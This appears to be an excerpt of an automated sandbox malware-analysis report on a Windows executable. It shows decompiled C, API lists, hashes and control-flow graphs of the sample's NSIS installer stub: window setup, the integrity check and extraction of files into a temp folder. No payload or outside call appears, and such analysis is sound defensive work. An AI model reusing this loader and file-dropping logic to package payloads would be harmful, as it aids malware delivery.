                        						if(_t122 != 2 || (GetWindowLongW(_t127, 0xfffffff0) & 0x21010000) != 0x1000000) {
                        							L28:
                        							return E004044DD(_a8, _t122, _a16);
                        						} else {
                        							ShowWindow(_t127, 4);
                        							goto L8;
                        						}
                        					}
                        				}
                        			}


                        APIs
                        • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403FB3
                        • ShowWindow.USER32(?), ref: 00403FD3
                        • GetWindowLongW.USER32(?,000000F0), ref: 00403FE5
                        • ShowWindow.USER32(?,00000004), ref: 00403FFE
                        • DestroyWindow.USER32 ref: 00404012
                        • SetWindowLongW.USER32(?,00000000,00000000), ref: 0040402B
                        • GetDlgItem.USER32 ref: 0040404A
                        • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 0040405E
                        • IsWindowEnabled.USER32(00000000), ref: 00404065
                        • GetDlgItem.USER32 ref: 00404110
                        • GetDlgItem.USER32 ref: 0040411A
                        • KiUserCallbackDispatcher.NTDLL(?,000000F2,?), ref: 00404134
                        • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 00404185
                        • GetDlgItem.USER32 ref: 0040422B
                        • ShowWindow.USER32(00000000,?), ref: 0040424C
                        • KiUserCallbackDispatcher.NTDLL(?,?), ref: 0040425E
                        • EnableWindow.USER32(?,?), ref: 00404279
                        • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 0040428F
                        • EnableMenuItem.USER32 ref: 00404296
                        • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 004042AE
                        • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 004042C1
                        • lstrlenW.KERNEL32(007A1F48,?,007A1F48,00000000), ref: 004042EB
                        • SetWindowTextW.USER32(?,007A1F48), ref: 004042FF
                        • ShowWindow.USER32(?,0000000A), ref: 00404433
                        Memory Dump Source
                        • Source File: 00000001.00000002.885897193.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000001.00000002.885892219.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                        • Associated: 00000001.00000002.885904269.0000000000408000.00000002.00000001.01000000.00000005.sdmp
                        • Associated: 00000001.00000002.885909054.000000000040A000.00000004.00000001.01000000.00000005.sdmp
                        • Associated: 00000001.00000002.886091471.000000000077C000.00000004.00000001.01000000.00000005.sdmp
                        • Associated: 00000001.00000002.886099918.0000000000782000.00000004.00000001.01000000.00000005.sdmp
                        • Associated: 00000001.00000002.886106311.0000000000786000.00000004.00000001.01000000.00000005.sdmp
                        • Associated: 00000001.00000002.886112266.0000000000788000.00000004.00000001.01000000.00000005.sdmp
                        • Associated: 00000001.00000002.886136070.00000000007A4000.00000004.00000001.01000000.00000005.sdmp
                        • Associated: 00000001.00000002.886142041.00000000007A6000.00000004.00000001.01000000.00000005.sdmp
                        • Associated: 00000001.00000002.886147369.00000000007A9000.00000004.00000001.01000000.00000005.sdmp
                        • Associated: 00000001.00000002.886152715.00000000007AD000.00000004.00000001.01000000.00000005.sdmp
                        • Associated: 00000001.00000002.886158026.00000000007B3000.00000004.00000001.01000000.00000005.sdmp
                        • Associated: 00000001.00000002.886162273.00000000007B5000.00000004.00000001.01000000.00000005.sdmp
                        • Associated: 00000001.00000002.886169924.00000000007D6000.00000002.00000001.01000000.00000005.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_1_2_400000_aSsc9zh1ex.jbxd
                        Similarity
                        • API ID: Window$Item$MessageSendShow$CallbackDispatcherEnableLongMenuUser$DestroyEnabledSystemTextlstrlen
                        • String ID:
                        • API String ID: 3618520773-0
                        • Opcode ID: 0031e1bd5cfe270ad991aee2cec6f31fffa44afcca6ec19933d696454b5d3b77
                        • Instruction ID: a523085d0bb4d20675d087507fe11aed99bae63dd77e7307ea40df4209393f8b
                        • Opcode Fuzzy Hash: 0031e1bd5cfe270ad991aee2cec6f31fffa44afcca6ec19933d696454b5d3b77
                        • Instruction Fuzzy Hash: 7FC1CEB1500604ABDB206F21ED85E2A3A69FBC6709F00853EF791B25E0CB3D5851DB6E
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Control-flow Graph

                        control_flow_graph 301 403bc9-403be1 call 4068e7 304 403be3-403bf3 call 406461 301->304 305 403bf5-403c2c call 4063e8 301->305 314 403c4f-403c78 call 403e9f call 405ef1 304->314 310 403c44-403c4a lstrcatW 305->310 311 403c2e-403c3f call 4063e8 305->311 310->314 311->310 319 403d0a-403d12 call 405ef1 314->319 320 403c7e-403c83 314->320 326 403d20-403d45 LoadImageW 319->326 327 403d14-403d1b call 406557 319->327 320->319 322 403c89-403cb1 call 4063e8 320->322 322->319 328 403cb3-403cb7 322->328 330 403dc6-403dce call 40140b 326->330 331 403d47-403d77 RegisterClassW 326->331 327->326 332 403cc9-403cd5 lstrlenW 328->332 333 403cb9-403cc6 call 405e16 328->333 344 403dd0-403dd3 330->344 345 403dd8-403de3 call 403e9f 330->345 334 403e95 331->334 335 403d7d-403dc1 SystemParametersInfoW CreateWindowExW 331->335 339 403cd7-403ce5 lstrcmpiW 332->339 340 403cfd-403d05 call 405de9 call 40651a 332->340 333->332 338 403e97-403e9e 334->338 335->330 339->340 343 403ce7-403cf1 GetFileAttributesW 339->343 340->319 347 403cf3-403cf5 343->347 348 403cf7-403cf8 call 405e35 343->348 344->338 354 403de9-403e03 ShowWindow call 406877 345->354 355 403e6c-403e6d call 40564f 345->355 347->340 347->348 348->340 360 403e05-403e0a call 406877 354->360 361 403e0f-403e21 GetClassInfoW 354->361 359 403e72-403e74 355->359 362 403e76-403e7c 359->362 363 403e8e-403e90 call 40140b 359->363 360->361 366 403e23-403e33 GetClassInfoW RegisterClassW 361->366 367 403e39-403e5c DialogBoxParamW call 40140b 361->367 362->344 368 403e82-403e89 call 40140b 362->368 363->334 366->367 372 403e61-403e6a call 403b19 367->372 368->344 372->338
                        C-Code - Quality: 96%
                        			E00403BC9(void* __eflags) {
                        				intOrPtr _v4;
                        				intOrPtr _v8;
                        				int _v12;
                        				void _v16;
                        				void* __ebx;
                        				void* __edi;
                        				void* __esi;
                        				intOrPtr* _t22;
                        				void* _t30;
                        				void* _t32;
                        				int _t33;
                        				void* _t36;
                        				int _t39;
                        				int _t40;
                        				int _t44;
                        				short _t63;
                        				WCHAR* _t65;
                        				signed char _t69;
                        				WCHAR* _t76;
                        				intOrPtr _t82;
                        				WCHAR* _t87;
                        
                        				_t82 =  *0x7a8a70;
                        				_t22 = E004068E7(2);
                        				_t90 = _t22;
                        				if(_t22 == 0) {
                        					_t76 = 0x7a1f48;
                        					L"1033" = 0x30;
                        					 *0x7b5002 = 0x78;
                        					 *0x7b5004 = 0;
                        					E004063E8(_t78, __eflags, 0x80000001, L"Control Panel\\Desktop\\ResourceLocale", 0, 0x7a1f48, 0);
                        					__eflags =  *0x7a1f48;
                        					if(__eflags == 0) {
                        						E004063E8(_t78, __eflags, 0x80000003, L".DEFAULT\\Control Panel\\International",  &M004083D4, 0x7a1f48, 0);
                        					}
                        					lstrcatW(L"1033", _t76);
                        				} else {
                        					E00406461(L"1033",  *_t22() & 0x0000ffff);
                        				}
                        				E00403E9F(_t78, _t90);
                        				_t86 = L"C:\\Users\\engineer\\AppData\\Local\\Temp";
                        				 *0x7a8ae0 =  *0x7a8a78 & 0x00000020;
                        				 *0x7a8afc = 0x10000;
                        				if(E00405EF1(_t90, L"C:\\Users\\engineer\\AppData\\Local\\Temp") != 0) {
                        					L16:
                        					if(E00405EF1(_t98, _t86) == 0) {
                        						E00406557(_t76, 0, _t82, _t86,  *((intOrPtr*)(_t82 + 0x118)));
                        					}
                        					_t30 = LoadImageW( *0x7a8a60, 0x67, 1, 0, 0, 0x8040); // executed
                        					 *0x7a7a48 = _t30;
                        					if( *((intOrPtr*)(_t82 + 0x50)) == 0xffffffff) {
                        						L21:
                        						if(E0040140B(0) == 0) {
                        							_t32 = E00403E9F(_t78, __eflags);
                        							__eflags =  *0x7a8b00;
                        							if( *0x7a8b00 != 0) {
                        								_t33 = E0040564F(_t32, 0);
                        								__eflags = _t33;
                        								if(_t33 == 0) {
                        									E0040140B(1);
                        									goto L33;
                        								}
                        								__eflags =  *0x7a7a2c;
                        								if( *0x7a7a2c == 0) {
                        									E0040140B(2);
                        								}
                        								goto L22;
                        							}
                        							ShowWindow( *0x7a1f28, 5); // executed
                        							_t39 = E00406877("RichEd20"); // executed
                        							__eflags = _t39;
                        							if(_t39 == 0) {
                        								E00406877("RichEd32");
                        							}
                        							_t87 = L"RichEdit20W";
                        							_t40 = GetClassInfoW(0, _t87, 0x7a7a00);
                        							__eflags = _t40;
                        							if(_t40 == 0) {
                        								GetClassInfoW(0, L"RichEdit", 0x7a7a00);
                        								 *0x7a7a24 = _t87;
                        								RegisterClassW(0x7a7a00);
                        							}
                        							_t44 = DialogBoxParamW( *0x7a8a60,  *0x7a7a40 + 0x00000069 & 0x0000ffff, 0, E00403F77, 0); // executed
                        							E00403B19(E0040140B(5), 1);
                        							return _t44;
                        						}
                        						L22:
                        						_t36 = 2;
                        						return _t36;
                        					} else {
                        						_t78 =  *0x7a8a60;
                        						 *0x7a7a04 = E00401000;
                        						 *0x7a7a10 =  *0x7a8a60;
                        						 *0x7a7a14 = _t30;
                        						 *0x7a7a24 = 0x40a380;
                        						if(RegisterClassW(0x7a7a00) == 0) {
                        							L33:
                        							__eflags = 0;
                        							return 0;
                        						}
                        						SystemParametersInfoW(0x30, 0,  &_v16, 0);
                        						 *0x7a1f28 = CreateWindowExW(0x80, 0x40a380, 0, 0x80000000, _v16, _v12, _v8 - _v16, _v4 - _v12, 0, 0,  *0x7a8a60, 0);
                        						goto L21;
                        					}
                        				} else {
                        					_t78 =  *(_t82 + 0x48);
                        					_t92 = _t78;
                        					if(_t78 == 0) {
                        						goto L16;
                        					}
                        					_t76 = 0x7a6a00;
                        					E004063E8(_t78, _t92,  *((intOrPtr*)(_t82 + 0x44)),  *0x7a8a98 + _t78 * 2,  *0x7a8a98 +  *(_t82 + 0x4c) * 2, 0x7a6a00, 0);
                        					_t63 =  *0x7a6a00; // 0x43
                        					if(_t63 == 0) {
                        						goto L16;
                        					}
                        					if(_t63 == 0x22) {
                        						_t76 = 0x7a6a02;
                        						 *((short*)(E00405E16(0x7a6a02, 0x22))) = 0;
                        					}
                        					_t65 = _t76 + lstrlenW(_t76) * 2 - 8;
                        					if(_t65 <= _t76 || lstrcmpiW(_t65, L".exe") != 0) {
                        						L15:
                        						E0040651A(_t86, E00405DE9(_t76));
                        						goto L16;
                        					} else {
                        						_t69 = GetFileAttributesW(_t76);
                        						if(_t69 == 0xffffffff) {
                        							L14:
                        							E00405E35(_t76);
                        							goto L15;
                        						}
                        						_t98 = _t69 & 0x00000010;
                        						if((_t69 & 0x00000010) != 0) {
                        							goto L15;
                        						}
                        						goto L14;
                        					}
                        				}
                        			}

























                        APIs
                          • Part of subcall function 004068E7: GetModuleHandleA.KERNEL32(?,00000020,?,0040361A,0000000B), ref: 004068F9
                          • Part of subcall function 004068E7: GetProcAddress.KERNEL32(00000000,?), ref: 00406914
                        • lstrcatW.KERNEL32(1033,007A1F48), ref: 00403C4A
                        • lstrlenW.KERNEL32(Call,?,?,?,Call,00000000,C:\Users\user\AppData\Local\Temp,1033,007A1F48,80000001,Control Panel\Desktop\ResourceLocale,00000000,007A1F48,00000000,00000002,76F1FAA0), ref: 00403CCA
                        • lstrcmpiW.KERNEL32(?,.exe,Call,?,?,?,Call,00000000,C:\Users\user\AppData\Local\Temp,1033,007A1F48,80000001,Control Panel\Desktop\ResourceLocale,00000000,007A1F48,00000000), ref: 00403CDD
                        • GetFileAttributesW.KERNEL32(Call,?,00000000,?), ref: 00403CE8
                        • LoadImageW.USER32 ref: 00403D31
                          • Part of subcall function 00406461: wsprintfW.USER32 ref: 0040646E
                        • RegisterClassW.USER32 ref: 00403D6E
                        • SystemParametersInfoW.USER32 ref: 00403D86
                        • CreateWindowExW.USER32 ref: 00403DBB
                        • ShowWindow.USER32(00000005,00000000,?,00000000,?), ref: 00403DF1
                        • GetClassInfoW.USER32 ref: 00403E1D
                        • GetClassInfoW.USER32 ref: 00403E2A
                        • RegisterClassW.USER32 ref: 00403E33
                        • DialogBoxParamW.USER32 ref: 00403E52
                        Strings
                        Memory Dump Source
                        • Source File: 00000001.00000002.885897193.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000001.00000002.885892219.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                        • Associated: 00000001.00000002.885904269.0000000000408000.00000002.00000001.01000000.00000005.sdmp
                        • Associated: 00000001.00000002.885909054.000000000040A000.00000004.00000001.01000000.00000005.sdmp
                        • Associated: 00000001.00000002.886091471.000000000077C000.00000004.00000001.01000000.00000005.sdmp
                        • Associated: 00000001.00000002.886099918.0000000000782000.00000004.00000001.01000000.00000005.sdmp
                        • Associated: 00000001.00000002.886106311.0000000000786000.00000004.00000001.01000000.00000005.sdmp
                        • Associated: 00000001.00000002.886112266.0000000000788000.00000004.00000001.01000000.00000005.sdmp
                        • Associated: 00000001.00000002.886136070.00000000007A4000.00000004.00000001.01000000.00000005.sdmp
                        • Associated: 00000001.00000002.886142041.00000000007A6000.00000004.00000001.01000000.00000005.sdmp
                        • Associated: 00000001.00000002.886147369.00000000007A9000.00000004.00000001.01000000.00000005.sdmp
                        • Associated: 00000001.00000002.886152715.00000000007AD000.00000004.00000001.01000000.00000005.sdmp
                        • Associated: 00000001.00000002.886158026.00000000007B3000.00000004.00000001.01000000.00000005.sdmp
                        • Associated: 00000001.00000002.886162273.00000000007B5000.00000004.00000001.01000000.00000005.sdmp
                        • Associated: 00000001.00000002.886169924.00000000007D6000.00000002.00000001.01000000.00000005.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_1_2_400000_aSsc9zh1ex.jbxd
                        Similarity
                        • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                        • String ID: .DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\$Call$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
                        • API String ID: 1975747703-4000614727
                        • Opcode ID: 1166395d184842cca1f9c9dbf690e44f16c4877d7fe222633aad620317193a3c
                        • Instruction ID: 5e1ff83f83eb9308ce16c84110d2fcc5f4f6a1078aae304d5a5647478e66a4f2
                        • Opcode Fuzzy Hash: 1166395d184842cca1f9c9dbf690e44f16c4877d7fe222633aad620317193a3c
                        • Instruction Fuzzy Hash: 0661A270240700BAD320AB669D45F2B3A6CEBC5B49F40853FF942B26E1DB7D9901CB6D
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 597 40307d-4030cb GetTickCount GetModuleFileNameW call 40600a 600 4030d7-403105 call 40651a call 405e35 call 40651a GetFileSize 597->600 601 4030cd-4030d2 597->601 609 4031f0-4031fe call 403019 600->609 610 40310b 600->610 602 4032ad-4032b1 601->602 617 403200-403203 609->617 618 403253-403258 609->618 612 403110-403127 610->612 614 403129 612->614 615 40312b-403134 call 4034ac 612->615 614->615 622 40325a-403262 call 403019 615->622 623 40313a-403141 615->623 620 403205-40321d call 4034c2 call 4034ac 617->620 621 403227-403251 GlobalAlloc call 4034c2 call 4032b4 617->621 618->602 620->618 643 40321f-403225 620->643 621->618 648 403264-403275 621->648 622->618 627 403143-403157 call 405fc5 623->627 628 4031bd-4031c1 623->628 633 4031cb-4031d1 627->633 646 403159-403160 627->646 632 4031c3-4031ca call 403019 628->632 628->633 632->633 639 4031e0-4031e8 633->639 640 4031d3-4031dd call 4069d4 633->640 639->612 647 4031ee 639->647 640->639 643->618 643->621 646->633 650 403162-403169 646->650 647->609 651 403277 648->651 652 40327d-403282 648->652 650->633 654 40316b-403172 650->654 651->652 653 403283-403289 652->653 653->653 655 40328b-4032a6 SetFilePointer call 405fc5 653->655 654->633 656 403174-40317b 654->656 659 4032ab 655->659 656->633 658 40317d-40319d 656->658 658->618 660 4031a3-4031a7 658->660 659->602 661 4031a9-4031ad 660->661 662 4031af-4031b7 660->662 661->647 661->662 662->633 663 4031b9-4031bb 662->663 663->633
                        C-Code - Quality: 80%
                        			E0040307D(void* __eflags, signed int _a4) {
                        				DWORD* _v8;
                        				DWORD* _v12;
                        				void* _v16;
                        				intOrPtr _v20;
                        				char _v24;
                        				intOrPtr _v28;
                        				intOrPtr _v32;
                        				intOrPtr _v36;
                        				intOrPtr _v40;
                        				signed int _v44;
                        				long _t43;
                        				signed int _t50;
                        				void* _t53;
                        				void* _t57;
                        				intOrPtr* _t59;
                        				long _t60;
                        				signed int _t65;
                        				signed int _t70;
                        				signed int _t71;
                        				signed int _t77;
                        				intOrPtr _t80;
                        				long _t82;
                        				signed int _t85;
                        				signed int _t87;
                        				void* _t89;
                        				signed int _t90;
                        				signed int _t93;
                        				void* _t94;
                        
                        				_t82 = 0;
                        				_v12 = 0;
                        				_v8 = 0;
                        				_t43 = GetTickCount();
                        				_t91 = L"C:\\Users\\engineer\\Desktop\\aSsc9zh1ex.exe";
                        				 *0x7a8a6c = _t43 + 0x3e8;
                        				GetModuleFileNameW(0, L"C:\\Users\\engineer\\Desktop\\aSsc9zh1ex.exe", 0x400);
                        				_t89 = E0040600A(_t91, 0x80000000, 3);
                        				_v16 = _t89;
                        				 *0x40a018 = _t89;
                        				if(_t89 == 0xffffffff) {
                        					return L"Error launching installer";
                        				}
                        				E0040651A(0x7b4800, _t91);
                        				E0040651A(0x7b7000, E00405E35(0x7b4800));
                        				_t50 = GetFileSize(_t89, 0);
                        				__eflags = _t50;
                        				 *0x79f704 = _t50;
                        				_t93 = _t50;
                        				if(_t50 <= 0) {
                        					L24:
                        					E00403019(1);
                        					__eflags =  *0x7a8a74 - _t82;
                        					if( *0x7a8a74 == _t82) {
                        						goto L29;
                        					}
                        					__eflags = _v8 - _t82;
                        					if(_v8 == _t82) {
                        						L28:
                        						_t34 =  &_v24; // 0x40385a
                        						_t53 = GlobalAlloc(0x40,  *_t34); // executed
                        						_t94 = _t53;
                        						E004034C2( *0x7a8a74 + 0x1c);
                        						_t35 =  &_v24; // 0x40385a
                        						_push( *_t35);
                        						_push(_t94);
                        						_push(_t82);
                        						_push(0xffffffff); // executed
                        						_t57 = E004032B4(); // executed
                        						__eflags = _t57 - _v24;
                        						if(_t57 == _v24) {
                        							__eflags = _v44 & 0x00000001;
                        							 *0x7a8a70 = _t94;
                        							 *0x7a8a78 =  *_t94;
                        							if((_v44 & 0x00000001) != 0) {
                        								 *0x7a8a7c =  *0x7a8a7c + 1;
                        								__eflags =  *0x7a8a7c;
                        							}
                        							_t40 = _t94 + 0x44; // 0x44
                        							_t59 = _t40;
                        							_t85 = 8;
                        							do {
                        								_t59 = _t59 - 8;
                        								 *_t59 =  *_t59 + _t94;
                        								_t85 = _t85 - 1;
                        								__eflags = _t85;
                        							} while (_t85 != 0);
                        							_t60 = SetFilePointer(_v16, _t82, _t82, 1); // executed
                        							 *(_t94 + 0x3c) = _t60;
                        							E00405FC5(0x7a8a80, _t94 + 4, 0x40);
                        							__eflags = 0;
                        							return 0;
                        						}
                        						goto L29;
                        					}
                        					E004034C2( *0x7936f8);
                        					_t65 = E004034AC( &_a4, 4);
                        					__eflags = _t65;
                        					if(_t65 == 0) {
                        						goto L29;
                        					}
                        					__eflags = _v12 - _a4;
                        					if(_v12 != _a4) {
                        						goto L29;
                        					}
                        					goto L28;
                        				} else {
                        					do {
                        						_t90 = _t93;
                        						asm("sbb eax, eax");
                        						_t70 = ( ~( *0x7a8a74) & 0x00007e00) + 0x200;
                        						__eflags = _t93 - _t70;
                        						if(_t93 >= _t70) {
                        							_t90 = _t70;
                        						}
                        						_t71 = E004034AC(0x78b6f8, _t90);
                        						__eflags = _t71;
                        						if(_t71 == 0) {
                        							E00403019(1);
                        							L29:
                        							return L"Installer integrity check has failed. Common causes include\nincomplete download and damaged media. Contact the\ninstaller\'s author to obtain a new copy.\n\nMore information at:\nhttp://nsis.sf.net/NSIS_Error";
                        						}
                        						__eflags =  *0x7a8a74;
                        						if( *0x7a8a74 != 0) {
                        							__eflags = _a4 & 0x00000002;
                        							if((_a4 & 0x00000002) == 0) {
                        								E00403019(0);
                        							}
                        							goto L20;
                        						}
                        						E00405FC5( &_v44, 0x78b6f8, 0x1c);
                        						_t77 = _v44;
                        						__eflags = _t77 & 0xfffffff0;
                        						if((_t77 & 0xfffffff0) != 0) {
                        							goto L20;
                        						}
                        						__eflags = _v40 - 0xdeadbeef;
                        						if(_v40 != 0xdeadbeef) {
                        							goto L20;
                        						}
                        						__eflags = _v28 - 0x74736e49;
                        						if(_v28 != 0x74736e49) {
                        							goto L20;
                        						}
                        						__eflags = _v32 - 0x74666f73;
                        						if(_v32 != 0x74666f73) {
                        							goto L20;
                        						}
                        						__eflags = _v36 - 0x6c6c754e;
                        						if(_v36 != 0x6c6c754e) {
                        							goto L20;
                        						}
                        						_a4 = _a4 | _t77;
                        						_t87 =  *0x7936f8; // 0x4fcbb
                        						 *0x7a8b00 =  *0x7a8b00 | _a4 & 0x00000002;
                        						_t80 = _v20;
                        						__eflags = _t80 - _t93;
                        						 *0x7a8a74 = _t87;
                        						if(_t80 > _t93) {
                        							goto L29;
                        						}
                        						__eflags = _a4 & 0x00000008;
                        						if((_a4 & 0x00000008) != 0) {
                        							L16:
                        							_v8 = _v8 + 1;
                        							_t93 = _t80 - 4;
                        							__eflags = _t90 - _t93;
                        							if(_t90 > _t93) {
                        								_t90 = _t93;
                        							}
                        							goto L20;
                        						}
                        						__eflags = _a4 & 0x00000004;
                        						if((_a4 & 0x00000004) != 0) {
                        							break;
                        						}
                        						goto L16;
                        						L20:
                        						__eflags = _t93 -  *0x79f704; // 0x4fcbf
                        						if(__eflags < 0) {
                        							_v12 = E004069D4(_v12, 0x78b6f8, _t90);
                        						}
                        						 *0x7936f8 =  *0x7936f8 + _t90;
                        						_t93 = _t93 - _t90;
                        						__eflags = _t93;
                        					} while (_t93 != 0);
                        					_t82 = 0;
                        					__eflags = 0;
                        					goto L24;
                        				}
                        			}
































                        APIs
                        • GetTickCount.KERNEL32 ref: 0040308E
                        • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\aSsc9zh1ex.exe,00000400,?,?,?,?,?,0040385A,?), ref: 004030AA
                          • Part of subcall function 0040600A: GetFileAttributesW.KERNELBASE(00000003,004030BD,C:\Users\user\Desktop\aSsc9zh1ex.exe,80000000,00000003,?,?,?,?,?,0040385A,?), ref: 0040600E
                          • Part of subcall function 0040600A: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,?,?,0040385A,?), ref: 00406030
                        • GetFileSize.KERNEL32(00000000,00000000,007B7000,00000000,007B4800,007B4800,C:\Users\user\Desktop\aSsc9zh1ex.exe,C:\Users\user\Desktop\aSsc9zh1ex.exe,80000000,00000003,?,?,?,?,?,0040385A), ref: 004030F6
                        • GlobalAlloc.KERNELBASE(00000040,Z8@,?,?,?,?,?,0040385A,?), ref: 0040322C
                        Strings
                        Memory Dump Source
                        • Source File: 00000001.00000002.885897193.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000001.00000002.885892219.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                        • Associated: 00000001.00000002.885904269.0000000000408000.00000002.00000001.01000000.00000005.sdmp
                        • Associated: 00000001.00000002.885909054.000000000040A000.00000004.00000001.01000000.00000005.sdmp
                        • Associated: 00000001.00000002.886091471.000000000077C000.00000004.00000001.01000000.00000005.sdmp
                        • Associated: 00000001.00000002.886099918.0000000000782000.00000004.00000001.01000000.00000005.sdmp
                        • Associated: 00000001.00000002.886106311.0000000000786000.00000004.00000001.01000000.00000005.sdmp
                        • Associated: 00000001.00000002.886112266.0000000000788000.00000004.00000001.01000000.00000005.sdmp
                        • Associated: 00000001.00000002.886136070.00000000007A4000.00000004.00000001.01000000.00000005.sdmp
                        • Associated: 00000001.00000002.886142041.00000000007A6000.00000004.00000001.01000000.00000005.sdmp
                        • Associated: 00000001.00000002.886147369.00000000007A9000.00000004.00000001.01000000.00000005.sdmp
                        • Associated: 00000001.00000002.886152715.00000000007AD000.00000004.00000001.01000000.00000005.sdmp
                        • Associated: 00000001.00000002.886158026.00000000007B3000.00000004.00000001.01000000.00000005.sdmp
                        • Associated: 00000001.00000002.886162273.00000000007B5000.00000004.00000001.01000000.00000005.sdmp
                        • Associated: 00000001.00000002.886169924.00000000007D6000.00000002.00000001.01000000.00000005.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_1_2_400000_aSsc9zh1ex.jbxd
                        Similarity
                        • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
                        • String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop\aSsc9zh1ex.exe$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$Z8@$soft
                        • API String ID: 2803837635-1494054606
                        • Opcode ID: 228fa0226a90281b4f2baa84689300d30e54d034f1a820beff8a1dc93a475882
                        • Instruction ID: 1f061f0c38a4f693c331b34270bc70c7c89456ffd71d5a2abe04866b7cb55e0c
                        • Opcode Fuzzy Hash: 228fa0226a90281b4f2baa84689300d30e54d034f1a820beff8a1dc93a475882
                        • Instruction Fuzzy Hash: 9551D071901204ABDB10AF65DD82B9E7FA8EB44756F10853BE501FA2C1CB7C8F418B5D
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 728 40176f-401794 call 402da6 call 405e60 733 401796-40179c call 40651a 728->733 734 40179e-4017b0 call 40651a call 405de9 lstrcatW 728->734 739 4017b5-4017b6 call 4067a1 733->739 734->739 743 4017bb-4017bf 739->743 744 4017c1-4017cb call 406850 743->744 745 4017f2-4017f5 743->745 752 4017dd-4017ef 744->752 753 4017cd-4017db CompareFileTime 744->753 746 4017f7-4017f8 call 405fe5 745->746 747 4017fd-401819 call 40600a 745->747 746->747 755 40181b-40181e 747->755 756 40188d-4018b6 call 40557c call 4032b4 747->756 752->745 753->752 757 401820-40185e call 40651a * 2 call 406557 call 40651a call 405b7a 755->757 758 40186f-401879 call 40557c 755->758 768 4018b8-4018bc 756->768 769 4018be-4018ca SetFileTime 756->769 757->743 790 401864-401865 757->790 770 401882-401888 758->770 768->769 772 4018d0-4018db FindCloseChangeNotification 768->772 769->772 773 402c33 770->773 777 4018e1-4018e4 772->777 778 402c2a-402c2d 772->778 775 402c35-402c39 773->775 780 4018e6-4018f7 call 406557 lstrcatW 777->780 781 4018f9-4018fc call 406557 777->781 778->773 787 401901-402398 780->787 781->787 791 40239d-4023a2 787->791 792 402398 call 405b7a 787->792 790->770 793 401867-401868 790->793 791->775 792->791 793->758
                        C-Code - Quality: 61%
                        			E0040176F(FILETIME* __ebx, void* __eflags) {
                        				void* __esi;
                        				void* _t35;
                        				void* _t43;
                        				void* _t45;
                        				FILETIME* _t51;
                        				FILETIME* _t64;
                        				void* _t66;
                        				signed int _t72;
                        				FILETIME* _t73;
                        				FILETIME* _t77;
                        				signed int _t79;
                        				WCHAR* _t81;
                        				void* _t83;
                        				void* _t84;
                        				void* _t86;
                        
                        				_t77 = __ebx;
                        				 *(_t86 - 8) = E00402DA6(0x31);
                        				 *(_t86 + 8) =  *(_t86 - 0x30) & 0x00000007;
                        				_t35 = E00405E60( *(_t86 - 8));
                        				_push( *(_t86 - 8));
                        				_t81 = L"Call";
                        				if(_t35 == 0) {
                        					lstrcatW(E00405DE9(E0040651A(_t81, 0x7b4000)), ??);
                        				} else {
                        					E0040651A();
                        				}
                        				E004067A1(_t81);
                        				while(1) {
                        					__eflags =  *(_t86 + 8) - 3;
                        					if( *(_t86 + 8) >= 3) {
                        						_t66 = E00406850(_t81);
                        						_t79 = 0;
                        						__eflags = _t66 - _t77;
                        						if(_t66 != _t77) {
                        							_t73 = _t66 + 0x14;
                        							__eflags = _t73;
                        							_t79 = CompareFileTime(_t73, _t86 - 0x24);
                        						}
                        						asm("sbb eax, eax");
                        						_t72 =  ~(( *(_t86 + 8) + 0xfffffffd | 0x80000000) & _t79) + 1;
                        						__eflags = _t72;
                        						 *(_t86 + 8) = _t72;
                        					}
                        					__eflags =  *(_t86 + 8) - _t77;
                        					if( *(_t86 + 8) == _t77) {
                        						E00405FE5(_t81);
                        					}
                        					__eflags =  *(_t86 + 8) - 1;
                        					_t43 = E0040600A(_t81, 0x40000000, (0 |  *(_t86 + 8) != 0x00000001) + 1);
                        					__eflags = _t43 - 0xffffffff;
                        					 *(_t86 - 0x38) = _t43;
                        					if(_t43 != 0xffffffff) {
                        						break;
                        					}
                        					__eflags =  *(_t86 + 8) - _t77;
                        					if( *(_t86 + 8) != _t77) {
                        						E0040557C(0xffffffe2,  *(_t86 - 8));
                        						__eflags =  *(_t86 + 8) - 2;
                        						if(__eflags == 0) {
                        							 *((intOrPtr*)(_t86 - 4)) = 1;
                        						}
                        						L31:
                        						 *0x7a8ae8 =  *0x7a8ae8 +  *((intOrPtr*)(_t86 - 4));
                        						__eflags =  *0x7a8ae8;
                        						goto L32;
                        					} else {
                        						E0040651A("C:\Users\engineer\AppData\Local\Temp\nsc4B5D.tmp", _t83);
                        						E0040651A(_t83, _t81);
                        						E00406557(_t77, _t81, _t83, "C:\Users\engineer\AppData\Local\Temp\nsc4B5D.tmp\System.dll",  *((intOrPtr*)(_t86 - 0x1c)));
